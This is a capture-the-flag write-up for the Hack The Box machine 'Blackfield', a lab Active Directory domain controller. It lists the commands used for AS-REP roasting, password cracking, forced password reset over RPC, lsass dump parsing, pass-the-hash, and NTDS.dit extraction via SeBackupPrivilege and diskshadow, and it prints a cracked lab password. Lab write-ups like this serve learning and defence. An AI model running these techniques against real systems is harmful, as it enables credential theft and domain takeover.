HTB-Blackfield

Information Gathering

Rustscan

Based on the ports open, this looked like a classic Active Directory server.

┌──(yoon㉿kali)-[~/Documents/htb/blackfield]
└─$ rustscan --addresses 10.10.10.192 --range 1-65535
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛
<snip>
Open 10.10.10.192:53
Open 10.10.10.192:88
Open 10.10.10.192:135
Open 10.10.10.192:389
Open 10.10.10.192:445
Open 10.10.10.192:593
Open 10.10.10.192:3268
Open 10.10.10.192:5985
Open 10.10.10.192:64771

Nmap

Nmap discovered domain name which I added to /etc/hosts.

┌──(yoon㉿kali)-[~/Documents/htb/blackfield]
└─$ sudo nmap -sVC -p 53,88,135,389,445,593,3268,5985 10.10.10.192   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-31 21:14 EDT
Nmap scan report for DC01 (10.10.10.192)
Host is up (0.37s latency).
 
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-04-01 08:11:14Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb2-time: 
|   date: 2024-04-01T08:11:40
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h56m40s
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.04 seconds

Enumeration

SMB - TCP 445

Crackmapexec discoverd domain name which I already added to /etc/host files:

10.10.10.192 DC01 DC01.BLACKFIELD.local BLACKFIELD.local BLACKFIELD

Luckily, SMB null login was allowed:

smbclient -N -L 10.10.10.192

Null user had access to profiles$ but all the other shares’ access was denied.

On profiles$ share, there were bunch of usernames:

I saved it to profile.txt

Using awk, I made a list of accounts to username.txt

usernames.txt is created and I decided to enumerate other services first before moving on to AS-REP Roasting or Kerbruting.

LDAP - TCP 389

Ldapsearch confirmed the base namingcontexts:

ldapsearch -H ldap://10.10.10.192 -x -s base namingcontexts

I tried null binding to the base but it was not allowed:

ldapsearch -H ldap://10.10.10.192 -x -b "DC=BLACKFILED,DC=LOCAL"

RPC - TCP 135

RPC also required credentials for querying:

Access as support

Kerbrute

Since I spent enough time on enumeration and nothing really showed up other than potential username, I moved on to Kerbruting.

Using Kerbrute, I can filter out valid username from KDC:

./kerbrute_linux_amd64 userenum -d BLACKFIELD.LOCAL --dc DC01.BLACKFIELD.LOCAL ~/Documents/htb/blackfield/username.txt

Kerbrute found three users: audit2020, support, and svc_backup.

More interestingly, user support seemed to be vulnerable to AS-REP Roasting

AS-REP Roasting

Using GetNPUsers.py, I can obtain hashcat crackable hash for user support:

GetNPUsers.py -no-pass -dc-ip 10.10.10.192 BLACKFIELD.LOCAL/support

Hash Cracking

Using hashcat, I cracked the password and credentials were obtained → support:#00^BlackKnight

haschat -m 18200 hash.asreproast rockyou.txt

Kerberoasting - Failed

I tried Kerberoasting with the found credentials but it didn’t work:

GetUserSPNs.py BLACKFIELD.LOCAL/support:'#00^BlackKnight' -dc-ip DC01.BLACKFIELD.LOCAL -request

SMB - SYSVOL & NETLOGON

I hoped user support had access to winrm but unfortunately it didn’t:

However, it had access to SMB:

I was able to access SYSVOL share as support and it had BLACKFIELD.local directory inside:

I recursively downloaded everything:

All the files were in Policies folder but none of those files had password keyword inside of it:

NETLOGON share was empty:

Access as audit2020

Bloodhound

Since all the enumeration done as user support returned nothing useful, I moved on to Bloodhound so I can enumerate Active Directory.

I first ran bloodhound-python to obtain json files with domain information:

sudo python bloodhound.py -u support -p '#00^BlackKnight' -c ALL -ns 10.10.10.192 -d BLACKFIELD.LOCAL

I started neo4j console and bloodhound using the commands below:

sudo neo4j console
bloodhound

I drag and dropped json files and first marked user support as owned:

Checking on Outbound Object Control, there was one First Degree Object Control for user support:

User SUPPORT@BLACKFIELD.LOCAL had the capability to change the user AUDIT2020@BLACKFIELD.LOCAL’s password without knowing that user’s current password.

ForceChangePassword for audit2020

Bloodhound provided me with guide on how to abuse this vulnerability but following this guide somehow didn’t work for me:

Instead, I signed-in to RPC as support and changed the password for audit2020:

setuserinfo2 audit2020 23 Password123!

Shell as svc_backup

SMB - Forensic

I tried Evil-Winrm as audit2020 with the changed password but it didn’t work. It seemed that audit2020 wasn’t in winrm group.

However, audit2020 did had an access to forensic share:

smbclient //10.10.10.192/forensic -U audit2020%'Password123!'

Again, I recursively downloaded everything:

In memory_analysis folder, there was one zip file that looked interesting: lsass.zip.

I unzipped the file to obtain lsass.DMP file:

sudo unzip lsass.zip

Using pypykatz, I was able to extract password hashes from the DMP file:

pypykatz lsa minidump lsass.DMP

I had NT hash for both svc_backup and Administrator:

Unfortunately, for some reason, passing the hash for administrator didn’t work:

However, passing the hash for svc_backup returned me a shell:

Privesc:svc_backup to Administrator

SeBackupPrivilege

Listing privilege that svc_backup had with whoami /priv, I saw SeBackupPrivilege which is a really strong privilege.

SeBackUpPrivilege basically allows for full system read and user svc_backup had this privilege because it was the member of Backup Operator Group:

By abusing this privilege, I can dump password hashes by downloading SAM,SYSTEM, and NTDS.dit file locally.

File Name	Description	Location
SAM	Security Account Manager database storing user account information and password hashes	%SystemRoot%\system32\config directory on Windows
SYSTEM	Windows registry file containing encryption keys and security-related data	%SystemRoot%\system32\config directory on Windows
NTDS.dit	Active Directory Database storing directory objects, including user account hashes	%SystemRoot%\NTDS directory on domain controllers

Execution

I used reg command to save registry key for SAM and SYSTEM saved it to Temp directory:

After downloading SAM and SYSTEM to local side, I can use pypykatz to extract password hashes.

PyPykatz is a Python library for parsing and manipulating credentials from Windows Security Account Manager (SAM) files, and I can use this to get password hashes:

pypykatz registry --sam sam system

Unfortunately, passing the above hash to crackmapexec didn’t work out.

Extracting NTDS.dit

I followed this tutorial by hacking articles.

Creating a Distributed Shell File (dsh file) that contains all the commands required by Diskshadow to run and create a full copy of our Windows Drive, from which I can then extract the ntds.dit file. I moved to the Kali Linux shell and created a dsh file. In this file, I instructed Diskshadow to create a copy of the C: Drive into a Z Drive with “jadu” as its alias. After creating this dsh file, I used unix2dos to convert the encoding and spacing of the dsh file to one that is compatible with the Windows machine.

1. Creating dsh file to copy C: drive:

2. Uploaded the dsh file and ran it to copy the disk:

3. Copied C drive into Z drive:

Now using the commands below, I downloaded ntds.dit and relevant files to local machine:

reg save hklm\system c:\Temp\system
cd C:\Temp
download ntds.dit
download system

Using secretsdump.py, I dumped all the password hashes:

Now I have shell as administrator:

Reference

• https://www.thehacker.recipes/a-d/movement/dacl/forcechangepassword
• https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens
• https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges
• https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/